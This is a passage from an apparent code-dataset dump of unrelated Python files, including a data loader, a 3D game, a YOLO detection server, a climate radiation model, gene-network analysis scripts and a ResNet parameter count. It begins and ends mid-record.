| (ccf_coord[:, 2] > LR_MAX)).any():\n raise ValueError(f\"Some coordinates in z column were outside the allowed range of [0, {LR_MAX}].\")\n\n # waveform\n if \"waveform\" in self._data:\n waveform = self._data[\"waveform\"]\n\n # numeric values\n if not np.issubdtype(waveform.dtype, np.integer) and not np.issubdtype(waveform.dtype, np.floating):\n raise TypeError(f\"Expecting numeric waveform values, got {waveform.dtype}.\")\n\n # 3 coords for each unit\n if waveform.ndim != 2 or waveform.shape[0] != nunits:\n raise ValueError(\n f\"Expecting a 2D array for waveform with {nunits} in the first dimension, got {waveform.shape}\")\n\n # timeseries\n if \"timeseries\" in self._data:\n timeseries = self._data[\"timeseries\"]\n\n if not np.issubdtype(timeseries.dtype, np.str_):\n raise TypeError(f\"Expecting an array of strings for timeseries, got {timeseries.dtype}.\")\n\n for t in timeseries:\n tval = self._data.get(t)\n if tval is None:\n raise KeyError(f\"Timeseries {t} specified, but not found.\")\n\n if tval.ndim != 2 or tval.shape[0] != nunits + 1:\n raise ValueError(\n f\"Expecting a 2D array for timeseries {t} with {nunits + 1} in the first dimension, got {tval.shape}\")\n\n # unit statistics\n if \"unit_stats\" in self._data:\n unit_stats = self._data[\"unit_stats\"]\n\n if not np.issubdtype(unit_stats.dtype, np.str_):\n raise TypeError(f\"Expecting an array of strings for unit_stats, got {unit_stats.dtype}.\")\n\n for s in unit_stats:\n sval = self._data.get(s)\n if sval is None:\n raise KeyError(f\"Unit statistic {s} specified, but not found.\")\n\n if sval.size != nunits:\n raise ValueError(\n f\"Expecting a 1D array for unit statistic {s} with {nunits} values, got {sval.shape}\")\n\n def get(self, key: str):\n \"\"\"Get value from data keyed by `key`, or None if `key` is not found.\"\"\"\n if self._data is not None:\n try:\n return self._data.get(key)\n except:\n return None\n\n def load_file(self, file_path: PathType, validate: bool = True):\n \"\"\"Load data from the file living at `file_path`.\n \n Parameters\n ----------\n file_path : str\n Path to file to load.\n validate : bool, optional\n Perform data validation iff true.\n \"\"\"\n type_check(file_path, PathType.__args__)\n self._file_path = file_path\n self._data = np.load(self._file_path)\n self._keys = {k for k in self._data.keys()}\n\n if validate:\n self._validate_data()\n\n @property\n def data(self) -> np.lib.npyio.NpzFile:\n return self._data\n\n @property\n def file_path(self) -> PathType:\n return self._file_path\n\n @file_path.setter\n def file_path(self, val: PathType):\n type_check(val, PathType.__args__)\n self._file_path = Path(val).resolve()\n\n @property\n def keys(self) -> Optional[set]:\n return self._keys\n","sub_path":"activity_viewer/loaders/npz_loader.py","file_name":"npz_loader.py","file_ext":"py","file_size_in_byte":5981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"194626648","text":"\"\"\"\n############################################################\nGlowfish - A 3D game as variation of tic-tac-toe\n############################################################\n\n:Author: *Carlo E. T. Oliveira*\n:Contact: carlo@nce.ufrj.br\n:Date: 2014/05/07\n:Status: This is a \"work in progress\"\n:Home: `Labase `__\n:Copyright: 2014, `GPL `__.\n\nIn GlowFish you combine the properties of blobs to win.\n\"\"\"\n__version__ = '0.1.0'\nvec = color = None\nL3, L2 = 6, 4\nCS = 120\nPD = 70\nPO = 10\n\n\nclass Blob:\n\n def __init__(self, gui):\n def pc(inb, oub, tin, szi, tou, szo):\n return lambda ps: inb(tin, szi, ps) + oub(tou, szo, ps)\n self.jail = None\n cl = color\n M, N, G, Y, S, L = cl.magenta, cl.blue, cl.green, cl.yellow, 10, 0\n TIN, TOU, SZI = (cl.magenta, cl.blue), (cl.green, cl.yellow), (20, 0)\n INB, OUB, SZO = (self.dice, self.ball), (self.frame, self.ring), (15, 0)\n bpos = [(x*125 - 4*CS, y*125, 3*CS) for x in range(-4, 0) for y in range(-4, 4)]\n bpos += [(x*125 + 5*CS, y*125, 3*CS) for x in range(0, 4) for y in range(-4, 4)]\n self.bpos = bpos\n self.gui = gui\n #gui.scene.bind(\"click\", self.click)\n self.blober = [\n pc(inb, oub, tin, szi, tou, szo)\n for inb in INB for oub in OUB for tin in TIN for szi in SZI for tou in TOU for szo in SZO]\n self.blob = [blob(pos) for pos, blob in zip(bpos, self.blober)]\n\n def dice(self, tint, size, ps):\n size += 20\n return [self.gui.box(pos=ps, size=(CS-PO-size, CS-PO-size, CS-PO-size), color=tint, opacity=1)]\n\n def ball(self, tint, size, ps):\n size -= 5\n return [self.gui.sphere(pos=ps, size=(CS-PO-size, CS-PO-size, CS-PO-size), color=tint, opacity=1)]\n\n def frame(self, tint, size, ps):\n return [\n self.gui.box(pos=ps, size=(CS, PO+size, CS), color=tint, opacity=1),\n self.gui.box(pos=ps, size=(CS, CS, PO+size), color=tint, opacity=1),\n self.gui.box(pos=ps, size=(PO+size, CS, CS), color=tint, opacity=1)]\n\n def ring(self, tint, size, ps):\n RCS = CS + 10\n return [\n self.gui.sphere(pos=ps, size=(RCS, PO+2*size, RCS), color=tint, opacity=1),\n self.gui.sphere(pos=ps, size=(RCS, RCS, PO+2*size), color=tint, opacity=1),\n self.gui.sphere(pos=ps, size=(PO+2*size, RCS, RCS), color=tint, opacity=1)]\n\n def click(self, event):\n obj = self.gui.scene.mouse.pick()\n objp = obj.pos\n pos = (objp.x, objp.y, objp.z)\n #print(\"blob click\", event.type, event.which, pos) # .x, obj.y, obj.z)\n if not pos in self.bpos:\n #print(\"click not in bpos\", self.bpos)\n return\n for blob in self.blob:\n for part in blob:\n part.visible = False\n obind = self.bpos.index(pos)\n for part in self.blob[obind]:\n part.visible = True\n\n self.jail.toggle(self.blob[obind])\n\n def show(self, ablob):\n self.blob[self.blob.index(ablob)] = []\n for blob in self.blob:\n for part in blob:\n part.visible = True\n\n\nclass Jail:\n def __init__(self, gui, blob):\n\n self.gui = gui\n blob.jail = self\n gui.scene.bind(\"click\", self.click)\n side = (-CS, 0, CS)\n side = (-3*CS, -CS, CS, 3*CS)\n self.hole = []\n self.obj = None\n self.cell = [[[(x, y, z) for x in side] for y in side] for z in side]\n self.loci = [(x, y, z) for x in side for y in side for z in side]\n self._click, self._next = blob.click, self.jail_click\n self.show = blob.show\n\n def draw(self):\n gui = self.gui\n #print (self.cell)\n self.hole = [gui.box(pos=cell, size=(CS-PD, CS-PD, CS-PD), color=color.gray(0.2), opacity=1)\n for plane in self.cell for line in plane for cell in line]\n\n #print(color.blue, list(hole.opacity for hole in self.hole))\n\n def click(self, event):\n self._click(event)\n\n def toggle(self, obj):\n self.obj = obj\n self._click, self._next = self._next, self._click\n\n def jail_click(self, event):\n obj = self.gui.scene.mouse.pick()\n objp = obj.pos\n pos = (objp.x, objp.y, objp.z)\n #print(event.type, event.which, pos, objp, self.obj) # .x, obj.y, obj.z)\n if not pos in self.loci:\n return\n #self.gui.sphere(pos=objp, size=(CS-PO, CS-PO, CS-PO), color=color.magenta, opacity=1)\n for part in self.obj:\n part.pos = vec(*pos) # objp\n obj.visible = False\n self.loci[self.loci.index(pos)] = None\n self.show(self.obj)\n self.toggle(self.obj)\n\n\ndef main(gui, gvec, gcolor):\n global vec, color\n vec = gvec\n color = gcolor\n print('Fishing %s' % __version__)\n #Aquarium(gui).draw()\n\n Jail(gui, Blob(gui)).draw()\n #Peixe(bry, _cons).animate(0)","sub_path":"src/glowfishing.py","file_name":"glowfishing.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"99256353","text":"import os\nimport sys\nimport argparse\nfrom yolo import YOLO, detect_video\nfrom PIL import Image\nfrom timeit import default_timer as timer\nfrom utils import load_extractor_model, load_features, parse_input, detect_object\nimport test\nimport utils\nimport pandas as pd\nimport numpy as np\nimport random\nimport urllib\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport time\nimport base64\nimport io\nimport traceback\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\ndef init_model():\n # Split images and videos\n img_endings = (\".jpg\", \".jpg\", \".png\", \".jpeg\")\n\n # define YOLO detector\n yolo = YOLO(\n **{\n \"model_path\": \"./trained_weights_final.h5\",\n \"anchors_path\": \"./yolo_anchors.txt\",\n \"classes_path\": \"./data_classes.txt\",\n \"score\": .30,\n \"gpu_num\": 1,\n \"model_image_size\": (416, 416),\n }\n )\n\n # Make a dataframe for the prediction outputs\n out_df = pd.DataFrame(\n columns=[\n \"image\",\n \"image_path\",\n \"xmin\",\n \"ymin\",\n \"xmax\",\n \"ymax\",\n \"label\",\n \"confidence\",\n \"x_size\",\n \"y_size\",\n ]\n )\n\n # labels to draw on images\n class_file = open(\"./data_classes.txt\", \"r\")\n input_labels = [line.rstrip(\"\\n\") for line in class_file.readlines()]\n return img_endings, yolo, out_df, class_file, input_labels\n\ndef process_image(img_endings, yolo, out_df, class_file, input_labels, img_base64=None):\n start = timer()\n text_out = \"\"\n # This is for images\n image_path ='./input.jpg'\n prediction, image = detect_object(\n yolo,\n image_path,\n save_img=True,\n save_img_path=\"./\",\n postfix=\"_output\",\n img_base64=img_base64\n )\n print(prediction)\n y_size, x_size, _ = np.array(image).shape\n for single_prediction in prediction:\n out_df = out_df.append(\n pd.DataFrame(\n [\n [\n os.path.basename(image_path.rstrip(\"\\n\")),\n image_path.rstrip(\"\\n\"),\n ]\n + single_prediction\n + [x_size, y_size]\n ],\n columns=[\n \"image\",\n \"image_path\",\n \"xmin\",\n \"ymin\",\n \"xmax\",\n \"ymax\",\n \"label\",\n \"confidence\",\n \"x_size\",\n \"y_size\",\n ],\n )\n )\n end = timer()\n print(\n \"Processed {} image in {:.1f}sec - {:.1f}FPS\".format(\n 1,\n end - start,\n 1.0 / (end - start),\n )\n )\n return prediction, image\n\nhostName = \"localhost\"\nserverPort = 7777\n\nprint(\"Initializing model\")\nimg_endings, yolo, out_df, class_file, input_labels = init_model()\n\nclass MyServer(BaseHTTPRequestHandler):\n def do_POST(self):\n try:\n print('received post to ' + hostName + \":\" + str(serverPort) + \"/\")\n length = int(self.headers['Content-Length'])\n img_base64 = (self.rfile.read(length))\n print('\\trunning inference')\n predictions, new_image = process_image(img_endings, yolo, out_df, class_file, input_labels, img_base64=img_base64)\n print('\\twriting response')\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n self.wfile.write(bytes('{\"predictions\":\"' + str(predictions) + '\", \"data\": \"', 'utf-8'))\n new_image_bytes=io.BytesIO() \n new_image.save(new_image_bytes, format='JPEG')\n new_image_bytes = new_image_bytes.getvalue()\n b64_new_image_bytes = base64.b64encode(new_image_bytes)\n self.wfile.write(b64_new_image_bytes)\n self.wfile.write(bytes('\"}',\"utf-8\"))\n print('\\tsending response')\n except Exception as e:\n traceback.print_exc()\n\nif __name__ == \"__main__\":\n webServer = HTTPServer((hostName, serverPort), MyServer)\n print(\"Server started http://%s:%s\" % (hostName, serverPort))\n\n try:\n webServer.serve_forever()\n except KeyboardInterrupt:\n pass\n\n webServer.server_close()\n print(\"Server stopped.\")\n","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"115076938","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n#\n# use pretty plotting if it can be imported\n#\ntry:\n import seaborn\nexcept:\n pass\n\nsigma=5.67e-8\n\ndef find_tau(tot_trans,num_layers):\n \"\"\"\n # -TD- document using\n \"\"\"\n trans_layer=tot_trans**(1./num_layers)\n tau_layer= -1.*np.log(trans_layer)\n tau_layers=np.ones([num_layers])*tau_layer\n tau_levels=np.cumsum(tau_layers)\n tau_levels=np.concatenate(([0],tau_levels))\n return tau_levels\n\ndef find_heights(press_levels,rho_layers):\n \"\"\"\n -TD- docstring using google style\n \"\"\"\n Rd=287.\n g=9.8\n press_layers=(press_levels[1:] + press_levels[:-1])/2.\n del_press=(press_levels[1:] - press_levels[0:-1])\n rho_layers=press_layers/(Rd*Temp_layers)\n del_z= -1.*del_press/(rho_layers*g)\n level_heights=np.cumsum(del_z)\n level_heights=np.concatenate(([0],level_heights))\n return level_heights\n\ndef fluxes(tau_levels,Temp_layers,T_surf):\n \"\"\"\n -TD- docstring using google style\n \"\"\"\n up_rad=np.empty_like(tau_levels)\n down_rad=np.empty_like(tau_levels)\n sfc_rad=sigma*T_surf**4.\n up_rad[0]=sfc_rad\n tot_levs=len(tau_levels)\n for index in np.arange(1,tot_levs):\n upper_lev=index\n lower_lev=index - 1\n layer_num=index-1\n del_tau=tau_levels[upper_lev] - tau_levels[lower_lev]\n trans=np.exp(-1.666*del_tau)\n emiss=1 - trans\n layer_rad=sigma*Temp_layers[layer_num]**4.*emiss\n up_rad[upper_lev]=trans*up_rad[lower_lev] + layer_rad\n down_rad[tot_levs-1]=0\n for index in np.arange(1,tot_levs):\n upper_lev=tot_levs - index\n lower_lev=tot_levs - index -1\n layer_num=tot_levs - index - 1\n del_tau=tau_levels[upper_lev] - tau_levels[lower_lev]\n trans=np.exp(-1.666*del_tau)\n emiss=1 - trans\n layer_rad=sigma*Temp_layers[layer_num]**4.*emiss\n down_rad[lower_lev]=down_rad[upper_lev]*trans + layer_rad\n return (up_rad,down_rad)\n\ndef heating_rate(net_up,height_levels,rho_layers):\n \"\"\"\n -TD- docstring using google style\n \"\"\"\n cpd=1004.\n dFn_dz= -1.*np.diff(net_up)/np.diff(height_levels)\n dT_dt=dFn_dz/(rho_layers*cpd)\n return dT_dt\n\ndef time_step(heating_rate,Temp_layers,delta_time):\n \"\"\"\n -TD- docstring using google style\n \"\"\"\n Temp_layers[:] = Temp_layers[:] + heating_rate*delta_time\n return Temp_layers\n\nif __name__==\"__main__\":\n \n tot_trans=0.2\n num_layers=100\n p_sfc=1000.*1.e2\n p_top=100.*1.e2\n g=9.8\n T_sfc=300.\n Rd=287. #J/kg/K\n num_levels=num_layers+1\n tau_levels=find_tau(tot_trans,num_layers)\n press_levels=np.linspace(p_top,p_sfc,num_levels)\n press_diff=np.diff(press_levels)[0]\n press_levels=press_levels[::-1]\n press_layers=(press_levels[1:] + press_levels[:-1])/2.\n Temp_levels=np.ones([num_levels])*T_sfc\n Temp_layers=(Temp_levels[1:] + Temp_levels[:-1])/2.\n\n S0=241.\n Tc=273.15\n delta_time_hr=30 #time interval in hours\n delta_time_sec=30*3600. #time interval in seconds\n stop_time_hr=600*24. #stop time in hours\n times=np.arange(0,stop_time_hr,delta_time_hr) #times in hours\n tot_loops=len(times)\n num_times=len(times)\n #\n # -TD- comment which variables are defined on levels, and which on layers\n #\n sfc_temp=np.empty([num_times],dtype=np.float64)\n hours=np.empty_like(sfc_temp)\n #\n # -TD- describe what the 2-d arrays are used for\n #\n air_temps=np.empty([num_layers,num_times],dtype=np.float64)\n up_flux_run=np.empty([num_levels,num_times],dtype=np.float64)\n down_flux_run=np.empty_like(up_flux_run)\n height_levels_run=np.empty_like(up_flux_run)\n \n for index in np.arange(0,num_times):\n rho_layers=press_layers/(Rd*Temp_layers)\n height_levels=find_heights(press_levels,rho_layers)\n up,down=fluxes(tau_levels,Temp_layers,T_sfc)\n sfc_temp[index]=T_sfc\n #\n # -TD- describe what this loop does\n #\n if np.mod(index,50)==0:\n the_frac=np.int(index/tot_loops*100.)\n sys.stdout.write(\"\\rpercent complete: %d%%\" % the_frac)\n sys.stdout.flush()\n air_temps[:,index]=Temp_layers[:]\n up,down=fluxes(tau_levels,Temp_layers,T_sfc)\n up_flux_run[:,index]=up[:]\n down_flux_run[:,index]=down[:]\n height_levels_run[:,index]=height_levels[:]\n dT_dt=heating_rate(up-down,height_levels,rho_layers)\n Temp_layers[:]=time_step(dT_dt,Temp_layers,delta_time_sec)\n #\n # -TD- describe what the following statements do\n #\n net_downsfc=S0 + down[0]\n T_sfc=(net_downsfc/sigma)**0.25\n \n plt.close('all')\n fig1,axis1=plt.subplots(1,1)\n snapshots=[0,2,8,30,40,50,60,70]\n days=times/24.\n for the_snap in snapshots:\n #\n # -TD- describe what the label does\n #\n label=\"%3.1f\" % days[the_snap]\n height_levels=height_levels_run[:,the_snap]\n layer_heights=(height_levels[1:] + height_levels[:-1])/2.\n axis1.plot(air_temps[:,the_snap],layer_heights*1.e-3,label=label)\n axis1.legend()\n axis1.set_title('temperature profiles for {} days'.format(len(snapshots)))\n axis1.set_xlabel('temperature (deg C)')\n fig1.savefig(\"snapshots.png\")\n\n fig2,axis2=plt.subplots(1,1)\n axis2.plot(days,sfc_temp-Tc)\n axis2.set_title('surface temperature (deg C)')\n axis2.set_ylabel('temperature (degC)')\n axis2.set_xlabel('day')\n axis2.set_xlim((0,100))\n fig2.savefig(\"sfc_temp.png\")\n\n fig3,axis3=plt.subplots(1,1)\n axis3.plot(days,sfc_temp - air_temps[0,:])\n axis3.set_title('air-sea temperature difference (deg C)')\n axis3.set_ylabel('surface - first layer temp (degC)')\n axis3.set_xlabel('day')\n axis3.set_xlim((0,100))\n fig3.savefig(\"air_sea.png\")\n\n plt.show()\n\n \n","sub_path":"lib/equil_run.py","file_name":"equil_run.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"61565041","text":"# RUN WITH /usr/bin/python3 minet.py (python 3.6)\n\nimport rpy2\nimport rpy2.robjects as ro\nimport rpy2.robjects.numpy2ri as rn\nimport numpy as np\nimport xml.dom.minidom as md\nfrom sklearn.metrics import roc_curve, auc\n\ndatadirname = \"/home/user/Sirius/gene_network_sirius_2019/Data\"\ndatafilename = datadirname + \"/{0}/{0}_data.txt\"\ngraphfilename = datadirname + \"/{0}/{0}_graph.xml\"\ndatalist = ['exps_10_bgr', 'exps_50_bgr', 'exps_100_bgr', 'genes_200_exps_10_bgr', 'genes_400_exps_10_bgr', 'genes_500_exps_10_bgr']\n# datalist = ['genes_700_exps_10_bgr', 'genes_1000_exps_10_bgr']\nalgolist = ['clr', 'aracne', 'mrnet', 'mrnetb']\n\ndef run_minet(filename, algo):\n\n rn.activate()\n\n code = \"\"\"library(minet)\n filename <- '\"\"\" + filename + \"\"\"'\n first <- readLines(filename, n=1)\n names <- strsplit(first, '\\t')\n names <- unlist(names, use.names=FALSE)\n d <- read.table(filename, skip=1, col.names = names)\n\n mim <- build.mim(d, estimator = \"mi.empirical\", disc = \"equalfreq\")\n\n weight_adjacency_matrix <- minet(mim, method='\"\"\" + algo + \"\"\"', estimator=\"mi.empirical\", disc=\"equalfreq\");\n\n weight_adjacency_matrix;\n \"\"\"\n\n f = ro.r(code)\n\n weight_adjacency_matrix = np.array(f)\n return weight_adjacency_matrix\n\n # long_array = weight_adjacency_matrix[np.triu_indices(weight_adjacency_matrix.shape[0])]\n # return long_array\n\n\n\ndef xml_graph_to_adjacency_matrix(filename):\n dom = md.parse(filename)\n\n # print(dom.toprettyxml())\n\n nodes = dom.getElementsByTagName(\"Node\")\n ids = [int(a.getAttribute('id')) for a in nodes]\n # parserint(ids)\n adjacency_matrix = np.zeros(shape=(len(ids), len(ids)))\n edges = dom.getElementsByTagName(\"Edge\")\n for e in edges:\n source = int(e.getElementsByTagName('from')[0].firstChild.nodeValue)\n target = int(e.getElementsByTagName('to')[0].firstChild.nodeValue)\n adjacency_matrix[source][target] = 1\n adjacency_matrix[target][source] = 1\n return adjacency_matrix\n\n\ndef adjacency_matrix_to_array_of_degrees(adjacency_matrix):\n degrees = [[] for i in range(len(adjacency_matrix))]\n for i in range(len(adjacency_matrix)):\n deg_i = 0\n for j in range(len(adjacency_matrix[i])):\n if adjacency_matrix[i][j] == 1:\n deg_i += 1\n degrees[deg_i].append(i)\n return degrees\n\n\nresults = np.zeros(shape=(len(datalist), len(algolist)))\n\nfor ii, dataname in enumerate(datalist):\n\n for jj, algo in enumerate(algolist):\n\n matrix = run_minet(datafilename.format(dataname), algo)\n true_matrix = xml_graph_to_adjacency_matrix(graphfilename.format(dataname))\n\n # print(matrix, true_matrix)\n\n degrees = adjacency_matrix_to_array_of_degrees(true_matrix)\n\n # print(degrees)\n\n aucs_mean = np.zeros(shape=(len(degrees)))\n aucs_var = np.zeros(shape=(len(degrees)))\n for i, deg in enumerate(degrees):\n if len(deg) != 0:\n aucs_d = np.zeros(shape=(len(deg)))\n for j, ind in enumerate(deg):\n true_array = true_matrix[ind]\n array = matrix[ind]\n # print(array, true_array)\n roc_auc = 0\n try:\n fpr, tpr, thresholds = roc_curve(true_array, array)\n roc_auc = auc(fpr, tpr)\n except:\n print(\"error\", dataname, algo)\n aucs_d[j] = roc_auc\n aucs_mean[i] = aucs_d.mean()\n aucs_var[i] = aucs_d.var()\n with open(\"result_analysis.txt\", \"a\") as f:\n print(dataname, algo)\n f.write(dataname + \" \" + algo + \":\" + '\\n')\n for i in range(len(aucs_mean)):\n if aucs_mean[i] != 0:\n f.write(str(i) + \" \" + str(aucs_mean[i]) + \" \" + str(aucs_var[i]) + '\\n')\n","sub_path":"MutualInformation/minet_analysis.py","file_name":"minet_analysis.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"335345588","text":"import numpy as np\n\nfrom keras.models import model_from_json\nfrom sklearn.metrics import classification_report,confusion_matrix\n\nfrom dataset import Dataset\nfrom constants import *\n\n\ndef evaluate_model(model, X_test, Y_test):\n print(\"Evaluating...\")\n loss, accuracy = model.evaluate(X_test, Y_test)\n print('\\nloss: {} - accuracy: {}'.format(loss, accuracy))\n\n\ndef save_model(model, model_name):\n # serialize model to JSON\n model_json = model.to_json()\n with open(model_name + \".json\", \"w\") as json_file:\n json_file.write(model_json)\n # serialize weights to HDF5\n model.save_weights(model_name + \".h5\")\n print(\"Saved model to disk\")\n\n\ndef load_model(model_name):\n # load json and create model\n json_file = open(model_name + '.json', 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n loaded_model.load_weights(model_name + \".h5\")\n loaded_model.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n )\n print(\"Loaded model from disk\")\n return loaded_model\n\ndef g_confusion_matrix(model, X_test, Y_test):\n y_pred = model.predict_classes(X_test)\n print(y_pred)\n\n p = model.predict_proba(X_test) # to predict probability\n\n target_names = [str(i) for i in range(273)]\n print('\\n' + classification_report(np.argmax(Y_test, axis=1), y_pred, target_names=target_names))\n print(confusion_matrix(np.argmax(Y_test, axis=1), y_pred))\n\n\nif __name__ == \"__main__\":\n # change 3 string parameters to test different sets and models\n d = Dataset(\"pkl_dataset/wooden_blur_10k/\", \"train_val_set_10000\")\n X_test, Y_test = d.get_train_dataset()\n\n m = load_model('trained_models/wooden_blur_10k_model')\n g_confusion_matrix(m, X_test, Y_test)","sub_path":"deeplane/model_handler.py","file_name":"model_handler.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"131148538","text":"import argparse\nimport sys\n\n#parser = argparse.ArgumentParser()\n#parser.add_argument('--vectors_file', default='twitter.txt', type=str)\n#args = parser.parse_args()\nvectors_file = sys.argv[1]\n\nwith open(vectors_file, 'r') as f:\n\twords = [(x.rstrip().split(' ')[0], x) for x in f.readlines()]\n\tvocab_file = open(\"vocab.txt\", \"w\")\n\tvector_out = open(\"vectors.txt\", \"w\")\n\tfor word in words:\n\t\tvocab_file.write(word[0] + \"\\n\")\n\t\tvector_out.write(word[1])\n","sub_path":"src/main/resources/worddist/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"584413042","text":"from resnet import resnet18\nfrom torchsummary import summary\nfrom pprint import pprint\n\n\n# Part (c)\nresnet = resnet18().to('cpu')\nsummary(resnet, (3, 224, 224))\n\n\n# Part(c): Alternate method\ndef add_wt(num_wts, key, value):\n if key not in num_wts:\n num_wts[key] = 0\n num_wts[key] += value\n\n\nlayer_map = {}\nwts_maps = {}\nfor name, obj in resnet.named_parameters():\n if name == \"conv1.weight\" or name == \"bn1.weight\" or name == \"bn1.bias\":\n add_wt(wts_maps, \"conv1\", obj.numel())\n elif name == \"fc.weight\" or name == \"fc.bias\":\n add_wt(wts_maps, \"fc\", obj.numel())\n else:\n name_s = name.split(\".\")\n layer_name = name_s[0] + \"-\" + name_s[1]\n add_wt(layer_map, name_s[0], obj.numel())\n if (\"conv1.weight\" in name) or (\"bn1.weight\" in name) or \\\n (\"bn1.bias\" in name):\n add_wt(wts_maps, layer_name + \"-conv1\", obj.numel())\n elif (\"conv2.weight\" in name) or (\"bn2.weight\" in name) or \\\n (\"bn2.bias\" in name):\n add_wt(wts_maps, layer_name + \"-conv2\", obj.numel())\n elif (\"downsample\" in name):\n add_wt(wts_maps, layer_name + \"-downsample\", obj.numel())\n\npprint(wts_maps)\nprint(\"---------\")\npprint(layer_map)\n\n# Part(e): Batch-norm split\nbatchNormGroup, biasGroup, restGroup = [], [], []\nfor name, param in resnet.named_parameters():\n numparam = 1\n print(name)\n for x in param.shape:\n numparam = numparam * x\n if \"bn\" in name or \"downsample.1\" in name:\n batchNormGroup.append((name, numparam))\n elif \"bias\" in name:\n biasGroup.append((name, numparam))\n else:\n restGroup.append((name, numparam))\n\n# Batch norm weights/bias\ntot_params = [0, 0, 0]\nfor name, numparam in batchNormGroup:\n tot_params[0] = tot_params[0] + numparam\n\n# From Finaly FC and downsample layers\nfor name, numparam in biasGroup:\n tot_params[1] = tot_params[1] + numparam\n\n# All conv wts/FC wts\nfor name, numparam in restGroup:\n tot_params[2] = tot_params[2] + numparam\n\nprint(\"--------------\")\nprint(\"BatchNorm params: \" + str((tot_params[0])))\nprint(\"Biases params: \" + str((tot_params[1])))\nprint(\"Rest params: \" + str((tot_params[2])))\nprint(\"Total params: \" + str(sum(tot_params)))\n","sub_path":"PS2/hw2 solutions/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"322843001","text":"#!/usr/bin/python\nimport tornado.ioloop\nimport tornado.web\nimport os\nimport json\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n \tself.render(\"d&dhome.html\")\n# self.write(\"The site has loaded.\")\n# self.render(\"static/html/d&dhome.html\")\n\ndef make_app():\n settings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\")\n }\n\n return tornado.web.Application([ \n (r\"/\", MainHandler),\n ], autoreload=True,\n **settings)\n\nif __name__ == \"__main__\":\n app = make_app()\n app.listen(8080)\n tornado.ioloop.IOLoop.current().start()\n\n#class MainHandler(tornado.web.RequestHandler):\n# def get(self):\n","sub_path":"website/ui/IanSite.py","file_name":"IanSite.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"486881701","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.2'\n\nsetup(name='ulif.pynotify',\n version=version,\n description=\"Helpers to bridge different Python envs and OpenOffice.org.\",\n long_description=open(\"README.txt\").read() + \"\\n\\n\" +\n open(\"CHANGES.txt\").read(),\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Framework :: Buildout\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n ],\n keywords='filesystem changes monitor watchdog inotify',\n author='Uli Fouquet',\n author_email='uli at gnufix.de',\n url='http://pypi.python.org/pypi/ulif.pynotify',\n license='GPL',\n packages=find_packages('src', exclude=['ez_setup']),\n package_dir = {'': 'src'},\n namespace_packages=['ulif', ],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'zc.buildout',\n ],\n setup_requires=[\"Sphinx-PyPI-upload\"],\n extras_require=dict(\n test = [\n 'zope.testing',\n 'zc.recipe.egg',\n ],\n docs = [\n 'Sphinx',\n 'collective.recipe.sphinxbuilder',\n 'docutils',\n 'roman',\n ],\n sqlite = [\n 'pysqlite',\n ],\n ),\n entry_points=\"\"\"\n [console_scripts]\n pynotify-ctl = ulif.pynotify.ui.pynotifyctl:main\n pynotify = ulif.pynotify.ui.pynotify:main\n \"\"\",\n )\n","sub_path":"pypi_install_script/ulif.pynotify-0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"594935121","text":"#Zufalls generator\nimport random\nrandom.seed()\n\n#werte und berechnung\n\na = random.randint(1,10)\nb = random.randint(1,10)\nc = a + b\n\nprint(\"Die Ausgabe:\", a, \"+\", b )\n\n#Eingabe\n\nprint(\"Bitte eine Zahl eingeben:\")\nz = input()\nzahl = int(z)\n\n#Mehrfach Verzweigung, logischer Operatoren\n#Bedingung mit mehreren Vergleichsoperatoren\n\nif zahl == c:\n print(zahl, \"ist richtig\")\nelif zahl < 0 or zahl > 100:\n print(zahl, \"ist ganz falsch\")\nelif c-1 <= zahl <= c+1:\n print(zahl, \"ist ganz nahe dran\")\nelse:\n print(zahl, \"ist falsch\")\n\n#Ende\n\nprint(\"Eergebnis:\", c)\n","sub_path":"spiel_operatorpy.py","file_name":"spiel_operatorpy.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"81906198","text":"from quickstats import models, tasks\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase, override_settings\n\n\nclass WaypointTest(TestCase):\n def setUp(self):\n self.user = User.objects.create(username=\"WaypointTest\")\n self.date 